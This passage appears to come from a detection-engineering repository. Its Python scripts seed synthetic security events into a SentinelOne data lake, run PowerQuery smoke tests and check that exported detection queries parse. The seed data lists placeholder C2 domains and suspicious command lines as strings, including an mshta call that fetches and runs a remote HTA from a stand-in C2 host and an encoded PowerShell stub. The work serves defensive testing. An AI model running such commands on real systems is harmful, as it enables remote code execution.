Events use SDL dotted-key JSON (the SDL `json` parser indexes
nested fields so queries can reference `event.login.userName`,
`dns.question.name`, `src.process.cmdline`, etc., as written
in the example PQ).
"""
from __future__ import annotations
import json
import sys
import time
import uuid
from datetime import datetime, timedelta, timezone
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import upload_logs, power_query # noqa: E402
NOW = datetime.now(timezone.utc).replace(microsecond=0)
def iso(dt: datetime) -> str:
    """Format *dt* as ``YYYY-MM-DDTHH:MM:SS.000Z``.

    The millisecond part is always written as "000" and no timezone
    conversion is applied.
    """
    return f"{dt:%Y-%m-%dT%H:%M:%S}.000Z"
def in_recent(seconds_ago: int) -> datetime:
    """Return the instant *seconds_ago* seconds before the module anchor NOW."""
    age = timedelta(seconds=seconds_ago)
    return NOW - age
# (user, host) pairs; build_events emits one full set of events per pair.
PAIRS = [
    ("alice@contoso.com", "host-alpha"),
    ("bob@contoso.com", "host-bravo"),
]
# Domain names used for the "DNS Resolved" events (one event per domain).
BAD_DOMAINS = ["c2.example.com", "suspect.example.net"]
# Command lines used for the "Process Creation" events (one event per entry).
LOLBINS = [
    "powershell -enc JABm...",
    "rundll32.exe shell32,Control_RunDLL",
    "mshta.exe http://c2.example.com/p.hta",
]
def build_events(run_id: str) -> list[dict]:
    """Build the synthetic events for every (user, host) pair in PAIRS.

    Events are FLAT dicts whose keys contain literal dots (for example
    `"event.category"`, not nested `{"event": {...}}`), so that the runnable
    example can reference columns such as `event.category`, `endpoint.name`,
    `dns.question.name` and `src.process.cmdline` by those names.

    Per pair, in order: three failed logins, one DNS event per BAD_DOMAINS
    entry, one process-creation event per LOLBINS entry. The first event is
    60 s before NOW and each following event is 30 s older than the last.
    The failed-login flag is emitted as the string "false".
    """
    events: list[dict] = []
    offset = 60  # seconds before NOW for the next event

    def stamped(fields: dict) -> dict:
        """Prefix *fields* with the shared time/run columns and age the clock."""
        nonlocal offset
        when = in_recent(offset)
        offset += 30
        return {
            "TimeGenerated": iso(when),
            "ts_epoch_ms": int(when.timestamp() * 1000),
            "proof_run_id": run_id,
            **fields,
        }

    for user, host in PAIRS:
        # ---- failed signins (event.category='logins')
        for _ in range(3):
            events.append(stamped({
                "event.category": "logins",
                "event.login.userName": user,
                "event.login.loginIsSuccessful": "false",
                "endpoint.name": host,
            }))
        # ---- bad DNS (event.type='DNS Resolved')
        for domain in BAD_DOMAINS:
            events.append(stamped({
                "event.type": "DNS Resolved",
                "dns.question.name": domain,
                "endpoint.name": host,
                "src.endpoint.user.name": user,
            }))
        # ---- suspicious process (event.type='Process Creation')
        for cmdline in LOLBINS:
            events.append(stamped({
                "event.type": "Process Creation",
                "endpoint.name": host,
                "src.process.cmdline": cmdline,
                "src.process.user": user,
            }))
    return events
def main() -> int:
    """Seed the events, wait for indexing, and record the run id.

    Returns 1 when uploadLogs does not report success, otherwise 0 (also
    when the indexing poll times out).
    """
    run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
    events = build_events(run_id)
    payload = "\n".join(json.dumps(event, default=str) for event in events)
    print(f"[seed_runnable_examples] events = {len(events)}")
    print(f"[seed_runnable_examples] run_id = {run_id}")
    print(f"[seed_runnable_examples] anchor = {NOW.isoformat()}")

    upload = upload_logs(payload, server_host="kql-proof",
                         logfile="runnable-examples.jsonl", parser="json")
    if upload.get("status") != "success":
        print(f"uploadLogs rejected: {upload}")
        return 1

    # Poll until indexed (use proof_run_id which is unique per run).
    print("Waiting for indexing", end="", flush=True)
    indexed = False
    for _ in range(30):
        time.sleep(2)
        resp = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
        table = resp.get("values") or []
        first_row = table[0] if table else None
        seen = int(first_row[0]) if first_row and first_row[0] is not None else 0
        print(f" {seen}", end="", flush=True)
        if seen >= len(events):
            indexed = True
            break
    print(" ✓ ready" if indexed else " (timeout, continuing)")

    marker = ROOT / "sample_data" / "runnable_examples_run_id.txt"
    marker.write_text(run_id)
    print(f"Wrote {marker}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
+26
View File
@@ -0,0 +1,26 @@
#!/usr/bin/env python3
"""Minimal PowerQuery smoke test against SDL."""
import sys, json, time
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
from harness.sdl_client import power_query

# The polling helper is optional: when harness.sdl_client does not provide
# it, a hard import would abort this script before any query is sent.
try:
    from harness.sdl_client import power_query_long_running
except ImportError:
    power_query_long_running = None


def _summarize(resp: dict) -> str:
    """Render *resp* as indented JSON with `values` replaced by a row count."""
    return json.dumps(
        {k: (v if k != 'values' else f'<{len(v or [])} rows>') for k, v in resp.items()},
        indent=2, default=str)


NOW_MS = int(time.time() * 1000)
START = NOW_MS - 30 * 24 * 3600 * 1000  # 30d back
END = NOW_MS
q = "dataset='kql-proof' | group n = count() by event_type"
print(f"Query: {q}")
print(f"Window: {START} .. {END}")
t0 = time.time()
r = power_query(q, START, END)
print(f"Initial response in {time.time()-t0:.2f}s:")
print(_summarize(r))
if r.get("continuationToken") or r.get("token"):
    if power_query_long_running is None:
        print("\nResponse carries a continuation token, but harness.sdl_client "
              "has no power_query_long_running helper; showing the initial "
              "response only.")
    else:
        print("\nPolling for completion ...")
        r = power_query_long_running(q, START, END, max_wait_sec=30)
        print(_summarize(r))
print("\nColumns:", r.get("columns"))
# `values` may be missing or null in the response.
print("First 20 values:", (r.get("values") or [])[:20])
+30
View File
@@ -0,0 +1,30 @@
#!/usr/bin/env python3
"""Pretty-print the PROOF.json summary as a table."""
import json
from pathlib import Path
# Load the machine-readable proof summary from reports/PROOF.json.
p = Path(__file__).resolve().parents[1] / "reports" / "PROOF.json"
data = json.loads(p.read_text())
local = data["local"]
pq = data.get("pq") or {}

print(f"{'Rule':<46} {'Ref rows':>9} {'SDL rows':>9} {'Status':<10}")
print("-" * 80)

# Counters for the footer line. "OK" means SDL returned at least one row,
# "EMPTY" means it returned none; neither compares keys with the reference.
n_ok = n_empty = n_error = 0
for rid, ref in local.items():
    p_entry = pq.get(rid) or {}
    if not pq:
        # Local-only report: there is no SDL side to show.
        status = ""
        sdl_n = "n/a"
    elif not p_entry.get("ok"):
        status = "ERROR"
        sdl_n = "?"
        n_error += 1
    else:
        # Treat a missing or null rowcount as zero rows.
        sdl_n = p_entry.get("rowcount") or 0
        if sdl_n > 0:
            status = "OK"
            n_ok += 1
        else:
            status = "EMPTY"
            n_empty += 1
    print(f"{rid:<46} {ref['n']:>9} {str(sdl_n):>9} {status:<10}")

print("-" * 80)
if pq:
    print(f"OK: {n_ok} EMPTY: {n_empty} ERROR: {n_error}")
print("\nFull report: reports/PROOF.md")
+62
View File
@@ -0,0 +1,62 @@
#!/usr/bin/env python3
"""Try /api/uploadLogs as an alternative to addEvents. We POST each line of
the JSONL as a raw event - SDL's json parser will extract fields automatically.
Per docs: max 6 MB per request, 10 GB/day per tenant, parser=json supports
auto-flattening of all keys."""
from __future__ import annotations
import json
import sys
import time
import uuid
from pathlib import Path
import requests
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
CFG = json.loads((ROOT / "config.json").read_text())
BASE = CFG["base_url"].rstrip("/")
WRITE = CFG["log_write_key"]
JSONL = ROOT / "sample_data" / "events.jsonl"
PROBE = uuid.uuid4().hex[:8]
print(f"probe = {PROBE}")

# Stamp each non-blank line with the probe marker and re-serialise it.
lines = [
    json.dumps({**json.loads(raw), "upload_probe": PROBE})
    for raw in JSONL.read_text().splitlines()
    if raw.strip()
]
body = "\n".join(lines)
print(f"body size = {len(body)} bytes ({len(lines)} lines)")

# uploadLogs takes the parser, host and logfile as request headers.
headers = {
    "Authorization": f"Bearer {WRITE}",
    "Content-Type": "text/plain",
    "parser": "json",
    "server-host": "kql-proof",
    "logfile": "kql-proof.jsonl",
}
upload = requests.post(
    f"{BASE}/api/uploadLogs",
    data=body.encode(),
    headers=headers,
    timeout=120,
    verify=True,
)
print(f"HTTP {upload.status_code} -> {upload.text[:500]}")

print("\nWaiting 15 s ...")
time.sleep(15)

# Query for the probe value
from harness.sdl_client import power_query
count_query = f"upload_probe='{PROBE}' | group n=count() by event_type"
answer = power_query(count_query, "30m")
print(f"\nQuery result: matching={answer.get('matchingEvents')}")
# Column metadata entries may be dicts with a "name" or plain names.
column_names = []
for col in answer.get("columns") or []:
    column_names.append(col.get("name") if isinstance(col, dict) else col)
for record in answer.get("values") or []:
    print(f" {dict(zip(column_names, record))}")
+92
View File
@@ -0,0 +1,92 @@
#!/usr/bin/env python3
"""Independent post-export verification.
Reads every file in `pq/` AS WRITTEN ON DISK (no template substitution,
no scope prefix, no harness magic) and POSTs it to /api/powerQuery on
the configured tenant. The script asserts each file:
* parses cleanly (no 'error/client/badParam' status),
* returns a syntactically valid response (status='success').
It does NOT assert that the query returns any rows; empty results are
fine. The purpose is to catch syntax / field / function errors so the
published .pq files are guaranteed runnable by anyone who copies them.
"""
from __future__ import annotations
import re
import sys
import time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query # noqa: E402
PQ_DIR = ROOT / "pq"
files = sorted(PQ_DIR.glob("*.pq"))
def strip_comments(text: str) -> str:
    """Remove whole-line ``//`` comments from a .pq file's text.

    A line is dropped when, ignoring leading whitespace, it begins with
    ``//``. The surviving lines are joined with newlines and the result is
    stripped of leading and trailing whitespace.
    """
    def is_code(line: str) -> bool:
        return not line.lstrip().startswith("//")

    code_lines = filter(is_code, text.splitlines())
    return "\n".join(code_lines).strip()
def collapse_whitespace(body: str) -> str:
    """Return *body* on a single line, with each whitespace run as one space.

    This mimics a user pasting the query into a web textbox that strips
    newlines. A correctly formatted PQ must survive the transformation:
    every `|` between stages has to be present in the text itself rather
    than implied by a line break.
    """
    single_line = re.sub(r"\s+", " ", body)
    return single_line.strip()
print(f"Verifying {len(files)} .pq files run cleanly on SDL ...")
print("(Each file tested in TWO forms: as-written and whitespace-collapsed.)")
print()
passed: list[str] = []
failed: list[tuple[str, str, str]] = [] # (file, variant, reason)
def run(name: str, variant: str, body: str) -> bool:
    """Execute one query variant and report whether SDL accepted it.

    Returns True only when the response status is "success". Any other
    outcome (an exception from the client, or a non-success status) is
    appended to the module-level `failed` list as (name, variant, reason)
    and yields False. Empty results still count as success.
    """
    started = time.time()
    try:
        resp = power_query(body, start_time="2h")
    except Exception as exc:
        failed.append((name, variant, f"exception: {exc}"))
        return False
    elapsed = time.time() - started
    status = resp.get("status", "")
    if status != "success":
        msg = resp.get("message", "")[:200]
        print(f"{name:<48} [{variant:<9}] {status} :: {msg}")
        failed.append((name, variant, f"{status}: {msg}"))
        return False
    matching = resp.get("matchingEvents", 0)
    print(f"{name:<48} [{variant:<9}] "
          f"matching={matching} ({elapsed:.1f}s)")
    return True
for pq_file in files:
    body = strip_comments(pq_file.read_text())
    if not body:
        failed.append((pq_file.name, "as-written", "empty after stripping comments"))
        continue
    # Both variants are always executed; the file passes only if both succeed.
    outcomes = [
        run(pq_file.name, variant, text)
        for variant, text in (
            ("as-written", body),
            ("collapsed", collapse_whitespace(body)),
        )
    ]
    if all(outcomes):
        passed.append(pq_file.name)

print()
print(f"PASS: {len(passed)} FAIL: {len(failed)}")
if failed:
    print()
    print("Failed queries:")
    for name, variant, why in failed:
        print(f" {name} [{variant}]: {why}")
    sys.exit(1)